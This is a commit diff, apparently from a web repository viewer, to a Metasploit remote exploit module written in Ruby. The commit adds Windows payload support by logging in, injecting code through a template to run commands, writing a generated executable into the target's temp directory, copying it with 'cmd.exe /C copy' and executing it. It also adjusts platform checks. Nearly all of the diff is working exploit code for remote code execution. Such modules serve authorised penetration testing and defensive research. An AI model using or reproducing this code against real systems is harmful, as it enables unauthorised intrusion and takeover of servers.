Support Win/Linx/Java payloads for Win/Linux platforms
parent
83824b2902
commit
f33e63c16f
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def do_explicit_check
|
def do_explicit_check
|
||||||
begin
|
begin
|
||||||
cookie = do_login
|
cookie = do_login
|
||||||
# I don't really care which command to execute, as long as it's a valid one.
|
# I don't really care which command to execute, as long as it's a valid one for both platforms.
|
||||||
# If the command is valid, it should return {"message"=>"0"}.
|
# If the command is valid, it should return {"message"=>"0"}.
|
||||||
# If the command is not valid, it should return an empty hash.
|
# If the command is not valid, it should return an empty hash.
|
||||||
c = get_exec_code('whoami')
|
c = get_exec_code('whoami')
|
||||||
|
@ -382,7 +382,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# @param new_fname [String] The new file
|
# @param new_fname [String] The new file
|
||||||
# @return [String]
|
# @return [String]
|
||||||
def get_dup_file_code(fname, new_fname)
|
def get_dup_file_code(fname, new_fname)
|
||||||
get_exec_code("cp #{fname} #{new_fname}")
|
if fname =~ /^\/[[:print:]]+/
|
||||||
|
cp_cmd = "cp #{fname} #{new_fname}"
|
||||||
|
else
|
||||||
|
cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}"
|
||||||
|
end
|
||||||
|
|
||||||
|
get_exec_code(cp_cmd)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -431,7 +437,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def target_platform_compat?(target_platform)
|
def target_platform_compat?(target_platform)
|
||||||
target.platform.names.grep(/#{target_platform}|java/i).empty? ? false : true
|
target.platform.names.each do |n|
|
||||||
|
if /^java$/i === n || /#{n}/i === target_platform
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -452,11 +464,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
c = get_temp_path_code
|
c = get_temp_path_code
|
||||||
res = inject_template(c, cookie)
|
res = inject_template(c, cookie)
|
||||||
json = res.get_json_document
|
json = res.get_json_document
|
||||||
if json['message']
|
json['message'] || ''
|
||||||
return json['message']
|
|
||||||
end
|
|
||||||
|
|
||||||
''
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_java_home_path(cookie)
|
def get_java_home_path(cookie)
|
||||||
|
@ -496,6 +504,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit_as_windows(cookie)
|
def exploit_as_windows(cookie)
|
||||||
|
tmp_path = get_tmp_path(cookie)
|
||||||
|
|
||||||
|
if tmp_path.blank?
|
||||||
|
fail_with(Failure::Unknown, 'Unable to get the temp path.')
|
||||||
|
end
|
||||||
|
|
||||||
|
exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)
|
||||||
|
exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
|
||||||
|
exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
|
||||||
|
exe_fname.gsub!(/Program Files/, 'PROGRA~1')
|
||||||
|
exe_new_fname.gsub!(/Program Files/, 'PROGRA~1')
|
||||||
|
register_files_for_cleanup(exe_fname, exe_new_fname)
|
||||||
|
|
||||||
|
print_status("Attempting to write #{exe_fname}")
|
||||||
|
c = get_write_file_code(exe_fname, exe)
|
||||||
|
inject_template(c, cookie)
|
||||||
|
|
||||||
|
print_status("New file will be #{exe_new_fname}")
|
||||||
|
c = get_dup_file_code(exe_fname, exe_new_fname)
|
||||||
|
inject_template(c, cookie)
|
||||||
|
|
||||||
|
print_status("Executing #{exe_new_fname}")
|
||||||
|
c = get_exec_code(exe_new_fname)
|
||||||
|
inject_template(c, cookie)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -542,7 +574,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_status("Target being detected as: #{target_platform}")
|
print_status("Target being detected as: #{target_platform}")
|
||||||
|
|
||||||
unless target_platform_compat?(target_platform)
|
unless target_platform_compat?(target_platform)
|
||||||
fail_with(Failure::BadConfig, 'Selected target does not match the target.')
|
fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
|
||||||
end
|
end
|
||||||
|
|
||||||
case target.name
|
case target.name
|
||||||
|
|
Loading…
Reference in New Issue